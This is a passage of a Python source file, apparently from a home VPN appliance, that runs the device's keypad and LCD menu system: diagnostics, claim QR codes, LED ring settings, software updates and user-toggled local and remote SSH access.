0x07\n buffer[1] = 0xff\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n # read registers again to reset interrupt\n buffer[0] = 0x00\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n time.sleep(0.1)\n buffer[0] = 0x01\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n time.sleep(0.1)\n # _inputs = self.aw.inputs\n # for i in range(1):\n # print(\"Inputs: {:016b}\".format(self.aw.inputs))\n # time.sleep(0.5)\n time.sleep(0.5)\n GPIO.add_event_detect(INT_EXPANDER, GPIO.FALLING, callback=self.key_press_cb)\n\n def key_press_cb(self, channel):\n inputs = self.aw.inputs\n # print(\"Inputs: {:016b}\".format(inputs))\n inputs = 127 - inputs & 0x7F\n if inputs < 1:\n return\n index = (int)(math.log2(inputs))\n exit_menu = False\n menu_base_index = 0\n window_size = len(self.window_stack)\n self.err_pending_ack = False\n if inputs > -1:\n # first set countdown for menu being active to 10\n # this ensures while menu is actively used\n # it is not overwritten\n self.menu_active_countdown = MENU_TIMEOUT\n # This below countdown will turn off screen if not used\n # every time keys are touched, the countdown will be reset\n self.countdown_to_turn_off_screen = NRML_SCREEN_TIMEOUT\n # if screen has timed out, first button press should ONLY\n # render the screen and nothing else\n if self.screen_timed_out is True:\n self.screen_timed_out = False\n # just show whatever the last menu was on screen\n self.render()\n return\n\n if BUTTONS[index] == \"up\":\n print(\"Key up on \" + str(index))\n if BUTTONS[index] == \"down\":\n print(\"Key down on \" + str(index))\n if BUTTONS[index] == 
\"back\":\n print(\"Key back on \" + str(index))\n if window_size > 0:\n back = self.window_stack.pop()\n self.menu_index = back\n self.render()\n elif window_size == 0:\n self.set_current_menu(0)\n exit_menu = True\n self.show_home_screen()\n if BUTTONS[index] in [\"1\", \"2\", \"0\"]:\n if window_size == 0 or (self.menu_index != self.window_stack[window_size - 1]):\n self.window_stack.append(self.menu_index)\n exit_menu = self.menu[self.menu_index][int(\n BUTTONS[index]) + menu_base_index][\"action\"]()\n if self.diag_shown is True:\n self.diag_shown = False\n if BUTTONS[index] == \"home\":\n print(\"Key home on \" + str(index))\n self.window_stack.clear()\n exit_menu = True\n self.show_home_screen()\n if exit_menu is False:\n self.render()\n\n def clear_screen(self):\n self.lcd.clear()\n\n def set_full_menu(self, menu, titles):\n self.menu = menu\n self.titles = titles\n\n def set_current_menu(self, index):\n self.menu_index = index\n\n def round_corner(self, radius, fill):\n \"\"\"Draw a round corner\"\"\"\n corner = Image.new('RGB', (radius, radius), (0, 0, 0, 0))\n draw = ImageDraw.Draw(corner)\n draw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, fill=fill)\n return corner\n\n def round_rectangle(self, size, radius, fill):\n \"\"\"Draw a rounded rectangle\"\"\"\n width, height = size\n rectangle = Image.new('RGB', size, fill)\n corner = self.round_corner(radius, fill)\n rectangle.paste(corner, (0, 0))\n rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it\n rectangle.paste(corner.rotate(180), (width - radius, height - radius))\n rectangle.paste(corner.rotate(270), (width - radius, 0))\n return rectangle\n\n def half_round_rectangle(self, size, radius, fill):\n \"\"\"Draw a rounded rectangle\"\"\"\n width, height = size\n rectangle = Image.new('RGB', size, fill)\n corner = self.round_corner(radius, fill)\n # rectangle.paste(corner, (0, 0))\n # rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it\n rectangle.paste(corner.rotate(180), (width - radius, height - radius))\n rectangle.paste(corner.rotate(270), (width - radius, 0))\n return rectangle\n\n def render(self, title=None):\n # get a font\n base = Image.new(\"RGBA\", (self.width, self.height), (0, 0, 0))\n fnt = ImageFont.truetype(DIR + 'rubik/Rubik-Light.ttf', 30)\n # fnt_title = ImageFont.truetype(DIR + 'rubik/Rubik-Light.ttf', 8)\n txt = Image.new(\"RGBA\", base.size, (255, 255, 255, 0))\n d = ImageDraw.Draw(txt)\n overlay = Image.new(\"RGBA\", base.size, (255, 255, 255, 0))\n if (title is None):\n title = self.titles[self.menu_index][\"text\"]\n if \"color\" in self.titles[self.menu_index]:\n color = self.titles[self.menu_index][\"color\"]\n else:\n color = (255, 255, 255)\n d.text(((200 - len(title) * 8) / 2, 2), title, font=fnt,\n fill=(color[0], color[1], color[2], 255))\n x = 10\n y = 0\n i = 0\n corner = None\n for item in self.menu[self.menu_index]:\n if \"display\" in item and item[\"display\"] is False:\n skip = True\n else:\n skip = False\n\n if \"color\" in item:\n color = item[\"color\"]\n else:\n color = (255, 255, 255)\n\n y = y + int(self.menu_row_y_size / 2) + self.menu_row_skip\n opacity = 128\n if not skip:\n opacity = 255\n corner = self.half_round_rectangle((200, self.menu_row_y_size), int(self.menu_row_y_size / 2),\n (255, 255, 255, 128))\n corner.putalpha(18)\n cornery = y\n overlay.paste(corner, (x, cornery))\n if not skip:\n d.text((x, y), \" \" + item['text'], font=fnt,\n fill=(color[0], color[1], color[2], opacity))\n i = i + 
1\n y = y + int(self.menu_row_y_size / 2)\n if self.menu_index == 5:\n # show a chin line for Home\n font_icon = ImageFont.truetype('/usr/local/pproxy/ui/heydings_icons.ttf', 25)\n y = y + int(self.menu_row_y_size / 2) + 6\n x = 20\n i = 0\n for c in self.chin['text']:\n if self.chin['errs'][i]:\n if i == 5:\n # for self-test, just show orange not red\n # self test is sadly unreliable\n # TODO: remove this once self test is reliable\n color = (255, 105, 0)\n else:\n color = (255, 0, 0)\n else:\n color = (0, 255, 0)\n i += 1\n d.text((x, y), c, font=font_icon,\n fill=(color[0],\n color[1],\n color[2],\n self.chin[\"opacity\"]))\n x += 30\n out = Image.alpha_composite(base, txt)\n out.paste(overlay, (0, 0), overlay)\n out = out.rotate(0)\n self.lcd.show_image(out)\n\n def show_claim_info(self):\n self.config.read(CONFIG_FILE)\n self.status.read(STATUS_FILE)\n current_key = self.status.get('status', 'temporary_key')\n serial_number = self.config.get('django', 'serial_number')\n display_str = [(1, \"Device Key:\", 0, \"blue\"), (2, str(current_key), 0, \"white\"),\n (3, \"Serial #\", 0, \"blue\"), (4, serial_number, 0, \"white\"), ]\n self.lcd.display(display_str, 20)\n # self.render()\n return True # exit the menu\n\n def show_claim_info_qrcode(self):\n current_key = self.status.get('status', 'temporary_key')\n serial_number = self.config.get('django', 'serial_number')\n display_str = [(1, \"https://red.we-pn.com/?pk=NONE&s=\" +\n str(serial_number) + \"&k=\" + str(current_key), 2, \"white\"), ]\n self.lcd.display(display_str, 20)\n return True # exit the menu\n\n def restart(self):\n self.lcd.set_logo_text(\"Restarting ...\")\n self.lcd.show_logo()\n self.device.reboot()\n return True # exit the menu\n\n def power_off(self):\n self.lcd.set_logo_text(\"Powering off ...\")\n self.lcd.show_logo()\n self.device.turn_off()\n return True # exit the menu\n\n def run_diagnostics(self):\n diag = WPDiag(self.logger)\n display_str = \"Starting Diagnostics, please wait.\"\n self.lcd.long_text(display_str, \"i\", \"green\")\n test_port = int(self.config.get('openvpn', 'port')) + 1\n self.diag_code = diag.get_error_code(test_port)\n serial_number = self.config.get('django', 'serial_number')\n time.sleep(3)\n display_str = [(1, \"Status Code\", 0, \"blue\"), (2, str(self.diag_code), 0, \"white\"),\n (3, \"Serial #\", 0, \"blue\"), (4, serial_number, 0, \"white\"),\n (5, \"Local IP\", 0, \"blue\"), (6, self.device.get_local_ip(), 0, \"white\"),\n (7, \"MAC Address\", 0, \"blue\"), (8, self.device.get_local_mac(), 0, \"white\"), ]\n self.lcd.display(display_str, 20)\n self.logger.debug(display_str)\n return True # stay in the menu\n\n def show_diag_qr_code(self):\n if not hasattr(self, \"diag_code\"):\n self.run_diagnostics()\n display_str = [(2, \"wepn://diag=\" + str(self.diag_code), 2, \"white\"), ]\n self.lcd.display(display_str, 19)\n self.diag_shown = True\n return True # stay in the menu\n\n def signal_main_wepn(self):\n with open(\"/var/run/pproxy.pid\", \"r\") as f:\n wepn_pid = int(f.readline())\n self.logger.debug(\"Signaling main process at: \" + str(wepn_pid))\n print(\"Signaling main process at: \" + str(wepn_pid))\n try:\n os.kill(wepn_pid, signal.SIGUSR1)\n except ProcessLookupError as process_error:\n self.logger.error(\"Could not find the process for main wepn: \" +\n str(wepn_pid) + \":\" + str(process_error))\n\n def show_dummy_home(self, new_title, new_str):\n new_menu_location = len(self.menu)\n self.titles.insert(new_menu_location, {\"text\": new_title})\n self.lcd.display(new_str, 
20)\n\n def append_current_title(self, new_str):\n _title = self.titles[self.menu_index][\"text\"] + new_str\n self.render(title=_title)\n\n def refresh_status(self, led_update=True):\n self.status.read(STATUS_FILE)\n diag_code = self.status.get(\"status\", \"last_diag_code\")\n if diag_code != \"\":\n self.prev_diag_code = self.diag_code\n self.diag_code = int(diag_code)\n if led_update:\n if self.diag_code != consts.HEALTHY_DIAG_CODE:\n if self.prev_diag_code == consts.HEALTHY_DIAG_CODE:\n # new error just detected\n # we need to show red pulse until user interacts with device\n self.err_pending_ack = True\n if self.err_pending_ack:\n # only pulse if no user interaction recorded since error was detected first\n self.led_client.pulse(color=(255, 0, 0), wait=100, repetitions=1)\n self.leds_turned_for_error = True\n else:\n if self.leds_turned_for_error:\n # turns off LEDS only if it set them previously\n # ideally, this will be a central place in led_manager\n # so one process cannot clear another ones\n # TODO(amir): updated to new patterns\n self.leds_turned_for_error = False\n self.led_client.blank()\n\n def show_home_screen(self):\n self.display_active = True\n self.status = configparser.ConfigParser()\n self.status.read(STATUS_FILE)\n state = self.status.get(\"status\", \"state\")\n if int(self.status.get(\"status\", \"claimed\")) == 0:\n if self.device.needs_package_update():\n # Disable showing QR Code when software needs upgrade\n # This way the update screen will not be covered\n # Other menus work though.\n # TODO: We need a proper WindowManager\n return\n self.show_claim_info_qrcode()\n else:\n # show the status info\n self.set_current_menu(5)\n self.titles[5][\"color\"] = (255, 255, 255)\n self.refresh_status(led_update=True)\n self.menu[5][0][\"display\"] = False\n self.menu[5][1][\"display\"] = False\n self.menu[5][2][\"text\"] = \"Menu\"\n self.menu[5][2][\"action\"] = self.show_main_menu\n self.menu[5][2][\"display\"] = True\n # TODO: self test is unreliable, so ignore bit 2\n if (self.diag_code | 32) != consts.HEALTHY_DIAG_CODE:\n if self.prev_diag_code == consts.HEALTHY_DIAG_CODE \\\n or self.prev_diag_code == 0:\n # first time after diag says there's an error\n # wake up the screen, and reset the count down\n self.screen_timed_out = False\n # keep screen on longer\n self.countdown_to_turn_off_screen = ERR_SCREEN_TIMEOUT\n color = (255, 0, 0)\n title = \"Error\"\n self.menu[5][1][\"text\"] = \"Help\"\n self.menu[5][1][\"action\"] = self.show_summary\n self.menu[5][1][\"display\"] = True\n else:\n if self.countdown_to_turn_off_screen > NRML_SCREEN_TIMEOUT:\n self.countdown_to_turn_off_screen = NRML_SCREEN_TIMEOUT\n color = (0, 255, 0)\n title = \"OK\"\n\n self.set_current_menu(5)\n self.titles[5][\"color\"] = color\n self.titles[5][\"text\"] = title\n icons, any_err, errs = self.lcd.get_status_icons_v2(state, self.diag_code)\n self.chin[\"text\"] = icons\n self.chin[\"errs\"] = errs\n self.chin[\"color\"] = color\n self.chin[\"opacity\"] = 255\n if self.screen_timed_out is False:\n self.render()\n\n def show_main_menu(self):\n self.display_active = True\n self.set_current_menu(0)\n self.render()\n\n def show_summary(self):\n self.display_active = True\n new_menu_location = len(self.menu)\n self.titles.insert(new_menu_location, {\"text\": \"Summary\"})\n self.status = configparser.ConfigParser()\n self.status.read(STATUS_FILE)\n state = self.status.get(\"status\", \"state\")\n icons, any_err, errs = self.lcd.get_status_icons_v2(state, self.diag_code)\n txts = [\n [\"Network 
up\", \"Internet up\", \"Services up\",\n \"Reachable\", \"Linked\", \"Self-tests pass\", \"Claimed\"],\n [\"Network down\", \"Internet down\", \"Services down\", \"Not reachable\", \"Not linked\", \"Self-tests fail\", \"Not claimed\"]]\n lines = []\n t = 1\n for i in range(len(icons)):\n if errs[i]:\n icon_color = \"red\"\n txt_color = \"red\"\n t = 1\n else:\n icon_color = \"green\"\n txt_color = \"white\"\n t = 0\n lines.append((txts[t][i], icons[i], txt_color, icon_color))\n self.lcd.show_summary(lines, 28)\n # stay in the menu\n return True\n\n def show_power_menu(self):\n self.display_active = True\n self.current_title = \"Power\"\n self.set_current_menu(1)\n self.render()\n\n def show_settings_menu(self):\n self.display_active = True\n self.current_title = \"Settings\"\n self.set_current_menu(3)\n self.render()\n\n def show_config_menu(self):\n self.display_active = True\n self.current_title = \"Access\"\n self.set_current_menu(6)\n self.render()\n\n def show_about_menu(self):\n self.display_active = True\n self.current_title = \"About\"\n self.set_current_menu(2)\n self.render()\n\n def toggle_led_setting(self):\n self.display_active = True\n options = [\"Yellow\", \"White\", \"Red\", \"Green\", \"Brown\", \"Rainbow\", \"Reset\", \"Off\"]\n\n new_index = (self.led_setting_index + 1) % len(options)\n if new_index < 5:\n # static on with colors\n self.led_enabled = True\n self.led_client.set_enabled(self.led_enabled)\n if new_index == 0:\n # yellow\n self.led_client.set_all(color=(255, 255, 0))\n elif new_index == 1:\n # white\n self.led_client.set_all(color=(255, 255, 255))\n elif new_index == 2:\n # red\n self.led_client.set_all(color=(255, 0, 0))\n elif new_index == 3:\n # green\n self.led_client.set_all(color=(0, 255, 0))\n elif new_index == 4:\n # brown\n self.led_client.set_all(color=(165, 42, 42))\n elif new_index == 5:\n # rainbow\n self.led_enabled = True\n self.led_client.set_enabled(self.led_enabled)\n self.led_client.rainbow(rounds=5, wait=50) # 100ms wait\n elif new_index == 6:\n # reset\n self.led_enabled = True\n self.led_client.set_enabled(self.led_enabled)\n self.led_client.blank()\n elif new_index == 7:\n # completely off\n self.led_client.blank()\n self.led_enabled = False\n self.led_client.set_enabled(self.led_enabled)\n\n # self.led_enabled = not self.led_enabled\n # self.led_client.set_enabled(self.led_enabled)\n # self.led_client.set_all(255,255,0)\n # s = \"OFF\"\n # if self.led_enabled:\n # s= \"ON\"\n self.menu[3][0][\"text\"] = \"Ring: \" + options[new_index]\n self.led_setting_index = new_index\n self.render()\n\n def channel_update(self):\n print(\"channel_update:\" + str(self.dev_remaining) + \" channel: \" + self.channel)\n if self.channel == \"prod\":\n if self.dev_remaining == 0:\n # 7 clicks done already, switch\n self.channel = \"dev\"\n self.chin = {\"text\": \"Development\", \"color\": (\n 255, 255, 255), \"opacity\": 50, \"errs\": [False] * 7}\n self.show_software_version()\n else:\n self.dev_remaining -= 1\n else:\n if self.dev_remaining == 7:\n self.channel = \"prod\"\n self.chin = {\"text\": \"Production\", \"color\": (\n 255, 255, 255), \"opacity\": 50, \"errs\": [False] * 7}\n self.show_software_version()\n else:\n self.dev_remaining += 1\n self.render()\n\n def show_software_version(self):\n print(\"show_software_version\")\n self.display_active = True\n self.set_current_menu(4)\n # ONLY FOR UX DEVELOPMENT, show the git hash\n import subprocess # nosec: dev only, static command = no injection\n label = \"production\"\n if self.channel == 
\"dev\":\n git_cmd = \"git log -1 --format=format:\\\"%H\\\"\"\n try:\n label = subprocess.check_output( # nosec: static command, go.we-pn.com/waiver-1\n git_cmd.split()).strip()\n label = label.decode(\"utf-8\")[1:8]\n except subprocess.CalledProcessError:\n # self.logger.error(e.output)\n label = \"no git hash\"\n else:\n label = self.device.get_installed_package_version()\n self.menu[4][0][\"text\"] = label\n self.menu[4][0][\"action\"] = self.channel_update\n self.render()\n\n def update_software(self):\n self.display_active = True\n self.menu[4][1][\"text\"] = \"checking ...\"\n self.render()\n if self.channel == \"prod\":\n self.device.software_update_blocking(self.lcd, self.led_client)\n else:\n self.device.software_update_from_git()\n self.menu[4][1][\"text\"] = \"Update\"\n self.show_software_version()\n\n def generate_config(self):\n self.display_active = True\n # this should only run if device has no real config\n # while initial provisioning is happening\n self.device.generate_new_config()\n self.config.read(CONFIG_FILE)\n self.render()\n self.show_claim_info()\n\n def toggle_ssh_server(self):\n self.lcd.long_text(\"Working on SSH\")\n ssh_server = \"ON\"\n if self.device.is_service_active(b'ssh.service'):\n ssh_server = \"OFF\"\n self.menu[6][1][\"text\"] = \"SSH: \" + ssh_server\n self.device.generate_ssh_host_keys()\n self.device.set_sshd_service(not\n self.device.is_service_active(b'ssh.service'))\n self.render()\n\n def toggle_remote_ssh_session(self):\n self.lcd.long_text(\"Working on Remote SSH\")\n if not self.device.is_remote_session_running():\n # if session is not running, start\n if not self.device.is_service_active(b'ssh.service'):\n # if local ssh server is off, first turn it on\n self.menu[6][1][\"text\"] = \"SSH: ON\"\n self.menu[6][2][\"text\"] = \"Remote: ON\"\n self.device.generate_ssh_host_keys()\n self.device.set_sshd_service(True)\n # ssh to the remote server, open local port\n # note: the remote server is exclusively for this\n # connect to relay.we-pn.com\n self.device.set_remote_ssh_session(enabled=True)\n else:\n # Provider might have enabled SSH server before\n # To be safe we will turn that off too, worst case they\n # will need to enable manually again.\n self.menu[6][1][\"text\"] = \"SSH: OFF\"\n self.menu[6][2][\"text\"] = \"Remote: OFF\"\n self.device.set_sshd_service(False)\n # Disabling SSH server would NOT terminate session too\n self.device.set_remote_ssh_session(enabled=False)\n\n self.render()\n\n\ndef main():\n keypad = KEYPAD()\n if keypad.enabled is False:\n return\n s = \"OFF\"\n if keypad.led_enabled:\n s = \"ON\"\n\n items = [\n [{\"text\": \"Settings\", \"action\": keypad.show_settings_menu},\n {\"text\": \"Power\", \"action\": keypad.show_power_menu},\n {\"text\": \"About\", \"action\": keypad.show_about_menu}, ],\n [{\"text\": \"Restart\", \"action\": keypad.restart},\n {\"text\": \"Power off\", \"action\": keypad.power_off}, ],\n [{\"text\": \"Diagnostics\", \"action\": keypad.run_diagnostics},\n {\"text\": \"Software\", \"action\": keypad.show_software_version}],\n [{\"text\": \"LED ring: \" + s, \"action\": keypad.toggle_led_setting},\n {\"text\": \"Access\", \"action\": keypad.show_config_menu}, ],\n [{\"text\": \"Getting version ... 
\" + s, \"action\": keypad.show_software_version},\n {\"text\": \"Update\", \"action\": keypad.update_software}, ],\n [{\"text\": \"\", \"display\": False, \"action\": 0},\n {\"text\": \"Help\", \"display\": False, \"action\": keypad.show_summary},\n {\"text\": \"Menu\", \"action\": keypad.show_home_screen}],\n [{\"text\": \"\", \"display\": False, \"action\": 0},\n {\"text\": \"\", \"display\": False, \"action\": 0},\n {\"text\": \"\", \"display\": False, \"action\": 0},\n ],\n ]\n titles = [{\"text\": \"Main\"}, {\"text\": \"Power\"}, {\"text\": \"About\"}, {\"text\": \"Settings\"},\n {\"text\": \"Software\"}, {\"text\": \"Home\", \"color\": (255, 255, 255)}, {\"text\": \"Access\", \"color\": (255, 0, 0)}]\n\n if 0 == int(keypad.status.get('status', 'claimed')):\n items[2].insert(0, {\"text\": \"Claim Info\", \"action\": keypad.show_claim_info})\n if keypad.config.get('django', 'serial_number') == \"CHANGE_SERIALNUM\":\n items[6].insert(0, {\"text\": \"Generate\", \"display\": True, \"action\": keypad.generate_config})\n if True:\n ssh_server = \"OFF\"\n if keypad.device.is_service_active(b'ssh.service'):\n ssh_server = \"ON\"\n items[6].insert(1, {\"text\": \"SSH: \" + ssh_server, \"display\": True,\n \"action\": keypad.toggle_ssh_server})\n if True:\n remote = \"OFF\"\n if keypad.device.is_remote_session_running():\n remote = \"ON\"\n items[6].insert(2, {\"text\": \"Remote: \" + remote, \"display\": True,\n \"action\": keypad.toggle_remote_ssh_session})\n\n keypad.set_full_menu(items, titles)\n keypad.set_current_menu(5)\n # default screen is QR Code\n keypad.show_home_screen()\n\n ############################\n # This is an example of how screen can show a custom message\n # This is to be used for getting messages from another process (socket?)\n # Advantage of showing the message from here is that the error message\n # will stay on (and not be overwritten by screen refreshes) until user\n # manually dismisses them\n # display_str = [(1, \"Status Code\", 0, \"blue\"), (2, \"123\", 0, \"white\"),\n # (3, \"Serial #\", 0, \"blue\"), (4, \"123\", 0, \"white\"),\n # (5, \"Local IP\", 0, \"blue\"), (6, \"123\", 0, \"white\"),\n # (7, \"MAC Address\", 0, \"blue\"), (8, \"123\", 0, \"white\"), ]\n # keypad.show_dummy_home(\"HOORA\", display_str)\n while True:\n # this timeout serves 2 purposes\n # first, if menu system (Keys) are not touched in some time,\n # it will take the menu back to home\n # second, if the status of device has changed (diag code updated in heartbeat)\n # this will refresh the home screen to show the new state (thumbs down/up).\n # challenge here is that if an error message is shown, this refresh should not overwrite it\n time.sleep(UNIT_TIMEOUT)\n if keypad.menu_index == 5:\n keypad.show_home_screen()\n else:\n # this allows showing LED error even within a different menu\n keypad.refresh_status(True)\n # print(\"menu_active_countdown: \" + str(keypad.menu_active_countdown) +\n # \" countdown_to_turnoff_screen: \" + str(keypad.countdown_to_turn_off_screen) +\n # \" screen is off? 
\" + str(keypad.screen_timed_out))\n keypad.menu_active_countdown -= 1\n if keypad.menu_active_countdown == 0:\n # this part ensures we read status and update screen info\n keypad.show_home_screen()\n keypad.menu_active_countdown = MENU_TIMEOUT\n if keypad.screen_timed_out is False:\n keypad.countdown_to_turn_off_screen -= 1\n if keypad.countdown_to_turn_off_screen == 0:\n keypad.screen_timed_out = True\n keypad.clear_screen()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n", "repo_name": "WE-PN/wepn-home", "sub_path": "usr/local/pproxy/system_services/keypad.py", "file_name": "keypad.py", "file_ext": "py", "file_size_in_byte": 32256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "logging.config.fileConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 33, "usage_type": "attribute"}, {"api_name": "self.configparser.config", "line_number": 52, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 52, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 52, "usage_type": "call"}, {"api_name": "self.configparser.config.read", "line_number": 53, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 53, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 53, "usage_type": "name"}, {"api_name": "self.configparser.status", "line_number": 54, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 54, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 54, "usage_type": "call"}, {"api_name": "self.configparser.status.read", "line_number": 55, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 55, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 55, "usage_type": "name"}, {"api_name": "self.configparser.logger", "line_number": 56, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 56, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 56, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 57, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 57, "usage_type": "name"}, {"api_name": "device.Device", "line_number": 57, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 57, "usage_type": "attribute"}, {"api_name": "self.configparser.display_active", "line_number": 58, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 58, "usage_type": "name"}, {"api_name": "self.configparser.window_stack", "line_number": 59, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 59, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 60, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 60, "usage_type": "name"}, {"api_name": "self.configparser.led_client", "line_number": 61, "usage_type": 
"attribute"}, {"api_name": "self.configparser", "line_number": 61, "usage_type": "name"}, {"api_name": "led_client.LEDClient", "line_number": 61, "usage_type": "call"}, {"api_name": "self.configparser.config.get", "line_number": 62, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 62, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 62, "usage_type": "name"}, {"api_name": "self.configparser.enabled", "line_number": 65, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 65, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 69, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 69, "usage_type": "name"}, {"api_name": "self.configparser.init_i2c", "line_number": 70, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 70, "usage_type": "name"}, {"api_name": "self.configparser.enabled", "line_number": 71, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 71, "usage_type": "name"}, {"api_name": "self.configparser.diag_shown", "line_number": 72, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 72, "usage_type": "name"}, {"api_name": "self.configparser.lcd", "line_number": 73, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 73, "usage_type": "name"}, {"api_name": "lcd.LCD", "line_number": 73, "usage_type": "call"}, {"api_name": "self.configparser.lcd.set_lcd_present", "line_number": 74, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 74, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 74, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 74, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 74, "usage_type": "attribute"}, {"api_name": "self.configparser.lcd.display", "line_number": 75, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 75, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 75, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 76, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 76, "usage_type": "name"}, {"api_name": "self.configparser.width", "line_number": 77, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 77, "usage_type": "name"}, {"api_name": "self.configparser.height", "line_number": 78, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 78, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 79, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 79, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_skip", "line_number": 80, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 80, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 81, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 81, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 82, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 82, "usage_type": "name"}, {"api_name": "self.configparser.led_setting_index", "line_number": 83, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 83, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 84, 
"usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 84, "usage_type": "name"}, {"api_name": "self.configparser.menu_active_countdown", "line_number": 85, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 85, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 86, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 86, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 87, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 87, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 88, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 88, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 89, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 89, "usage_type": "name"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 90, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 90, "usage_type": "name"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 91, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 91, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 92, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 92, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 93, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 93, "usage_type": "name"}, {"api_name": "RPi.GPIO.setmode", "line_number": 96, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 96, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 96, "usage_type": "attribute"}, {"api_name": "board.I2C", "line_number": 97, "usage_type": "call"}, {"api_name": "RPi.GPIO.setup", "line_number": 99, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 99, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 99, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PUD_UP", "line_number": 99, "usage_type": "attribute"}, {"api_name": "self.configparser.aw", "line_number": 101, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 101, "usage_type": "name"}, {"api_name": "adafruit_aw9523.AW9523", "line_number": 101, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device.I2CDevice", "line_number": 102, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device", "line_number": 102, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 105, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 105, "usage_type": "name"}, {"api_name": "adafruit_aw9523.AW9523", "line_number": 105, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device.I2CDevice", "line_number": 106, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device", "line_number": 106, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 108, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 108, 